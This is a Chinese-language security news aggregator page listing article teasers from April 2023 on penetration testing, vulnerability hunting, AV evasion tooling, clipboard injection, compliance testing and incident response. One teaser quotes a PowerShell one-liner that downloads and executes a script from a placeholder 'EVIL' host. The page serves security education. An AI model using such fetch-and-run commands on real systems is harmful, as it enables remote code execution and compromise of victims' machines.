专家视角：仓促上马大语言模型的风险 贝里维尔机器学习研究所（BIML）最近参加了网络安全公司Calypso AI在美国华盛顿特区举行的Accelerate AI 2023大会。会议囊括了来自政府和产业界、监管部门，以及学术界的从业人员。... 2023-4-30 09:3:18 | 阅读: 11 | 收藏 | 黑白之道 llm 模型 信息 数据 风险

新规：关闭弹出广告不得经两次以上点击；抓获2名“黑灰产”犯罪嫌疑人，其中1人为某通讯运营商加盟营业厅工作人员 新规！互联网广告新限制：关闭弹出广告不得经两次以上点击快科技4月29日消息，今天五一假期已经开启，假期中就要正式进入5月份了，同事也有一大批新规即将开始执行。其中最受关注之一就是互联网广告新规，将于5... 2023-4-30 09:3:14 | 阅读: 15 | 收藏 | 黑白之道 犯罪 信息 吴某 海沧 网络

四个有趣的真实漏洞挖掘案例 0x00 前言好久没写真实漏洞挖掘案例了，今天写一笔。直接发漏洞细节很生硬，大家也学不到什么，只有带入感情，留下笔者的想法，才能产生共鸣，真正的帮助到别人。四个漏洞描述顺序：存储过程sql注入；tab... 2023-4-30 09:2:15 | 阅读: 21 | 收藏 | 菜鸟学信安 注入 漏洞 ssrf 信息 端口

云安全案例4：黑客在谷歌云中淘宝 这篇文章介绍了嵌入在 Docker 镜像中的密钥，以包含在公共谷歌云 Docker 镜像 (Apigee) 作为示例，以及如何使用这些示例来利用正在运行的服务。背景密钥不应在构建时嵌入到 Docker... 2023-4-30 08:21:50 | 阅读: 15 | 收藏 | 奶牛安全 镜像 apigee 源代码 谷歌 e2e

安全研发之剪贴板注入 前言Windows 剪贴板允许我们以各种不同的格式存储数据，这样可以避免在注入执行 payload 的过程中使用一些比较敏感的 API，比如：VirtualAllocEx、WriteProcessMe... 2023-4-30 08:11:5 | 阅读: 13 | 收藏 | 灰帽安全 hthread colourtable hbitmapdata payload

内网渗透系列之域渗透深入弹shell开3389拿域控 本文已首发于i春秋，仅作为实验参考，不属于任何技术文章，https://www.jianshu.com/p/2c49788239d4。实验目的：拿下一号机shell开3389远程登录拓扑图A组（靶场）... 2023-4-30 08:9:8 | 阅读: 16 | 收藏 | 系统安全运维 账号 windows hb123456 端口 hiro

神器推荐｜常见密码哈希离线查询工具 一款常见密码哈希离线查询工具，包含算法类型 ：'md5', 'md5x2', 'md5x3', 'sha1', 'ntlm', 'mysql', 'mysql5', 'md5_sha1', 'sha1... 2023-4-30 08:9:4 | 阅读: 15 | 收藏 | 系统安全运维 哈希 利器 漏洞 神兵 mysql5

免杀工具 -- SysWhispers3WinHttp（4月23日更新） ===================================免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负... 2023-4-30 08:1:35 | 阅读: 40 | 收藏 | Web安全工具库 编程 windows 免杀

关于gitlab-ce数据库丢失后的修复 简介在2023年4月24日晚接到gitlab升级通知后，例行升级惹出的大问题。本文记录了修复gitlab的全过程及中间放下的错。由于中间部分操作未能及时记录截图，所以在这使用中间备份的一些场景进行复现... 2023-4-30 08:0:25 | 阅读: 15 | 收藏 | ChaMd5安全团队 gitlab 仓库 migration throttle 数据

OSI模型及对应的攻击 2023-4-30 07:53:53 | 阅读: 9 | 收藏 | 格格巫和蓝精灵 格格 精灵 蓝精灵

自动化渗透测试工具开发实践 为了提高安全服务项目的检测效率、规范性、全面性，Tide安全团队结合在渗透测试行业的经验和安全开发方面的积累，开发了一款自动化渗透测试工具。该工具使用Golang开发为CS架构，集“资产探测-服务识别... 2023-4-30 00:28:4 | 阅读: 94 | 收藏 | 白帽子 漏洞 github 数据 渗透 爬虫

使用Openapi-generator快速生成acunetix_sdk STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此... 2023-4-30 00:28:0 | 阅读: 21 | 收藏 | 白帽子 acunetix openapi typescript client python

一些有趣的powershell加载命令 普通下载IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")PowerShell 3.0+IEX (iwr 'ht... 2023-4-30 00:10:43 | 阅读: 40 | 收藏 | 橘猫学安全 渗透 爆破 xmlhttp comobject

SRC混子的漏洞挖掘之道 一个SRC混子挖SRC的半年经验分享~,基本都是文字阐述，希望能给同样在挖洞的师傅们带来一点新收获。前期信息收集还是那句老话,渗透测试的本质是信息收集，对于没有0day的弱鸡选手来说，挖SRC感觉更像... 2023-4-30 00:10:37 | 阅读: 29 | 收藏 | 橘猫学安全 漏洞 信息 github 绕过 子公司

【等保测评】详解网络安全等级保护S3A3安全物理环境 原创文章，水平有限，如有错误，欢迎指正。文中测评+整改加固一键脚本加知识星球获取。概述网络安全等级保护S3A3安全物理环境中主要包括以下10个部分：物理位置选择、物理访问控制、防盗窃和防破坏、防雷击、... 2023-4-30 00:3:18 | 阅读: 23 | 收藏 | 利刃信安攻防实验室 机房 核查 攻防 利刃 数据

【等保测评】详解网络安全等级保护S3A3安全计算环境之操作系统（Win） 原创文章，水平有限，如有错误，欢迎指正。文中测评+整改加固一键脚本加知识星球获取。概述网络安全等级保护S3A3安全计算环境之操作系统（Win）中主要包括以下11个部分：身份鉴别、访问控制、安全审计、入... 2023-4-30 00:3:15 | 阅读: 19 | 收藏 | 利刃信安攻防实验室 安全 审计 核查 控制 netsh

实战｜记两起挖矿木马排查 5月17日下午，发现有人爆破我服务器的口令。查了下是 fdl 的，联系他询问情况。登录上去看到有个用户 127.0.0.1登录的，一看就知道是映射到公网被人登录了确认该账号无人使用修改密码然后踢出用户... 2023-4-30 00:3:14 | 阅读: 26 | 收藏 | LemonSec ssh static2 xmrig 攻击 脚本

【等保测评】详解网络安全等级保护S3A3安全计算环境之操作系统（Linux） 原创文章，水平有限，如有错误，欢迎指正。文中测评+整改加固一键脚本加知识星球获取。概述网络安全等级保护S3A3安全计算环境之操作系统（Linux）中主要包括以下11个部分：身份鉴别、访问控制、安全审计... 2023-4-30 00:3:11 | 阅读: 36 | 收藏 | 利刃信安攻防实验室 安全 核查 rwxa ssh 审计

好用的漏洞扫描工具 -- DongTai 0x01 工具介绍DongTai是一款交互式应用安全测试（IAST）产品，支持检测OWASP WEB TOP 10漏洞、多请求相关漏洞（包括逻辑漏洞、未授权访问漏洞等）、第三方组件漏洞等。目前，Jav... 2023-4-30 00:3:10 | 阅读: 23 | 收藏 | LemonSec 漏洞 渗透 dongtai hxsecurity 账号

某X运营商外网打点到内网横向渗透的全过程 Part1 前言 大家好，我是ABC_123，不知不觉，我一个人已经连续写了51篇原创文章了。本期复盘一次之前做过的某运营商的外网打点到内网横向过程，由于是好多年前的了，很多细节记不清了，但是关键步... 2023-4-30 00:0:42 | 阅读: 47 | 收藏 | 渗透安全团队 漏洞 渗透 代理 横向 跳板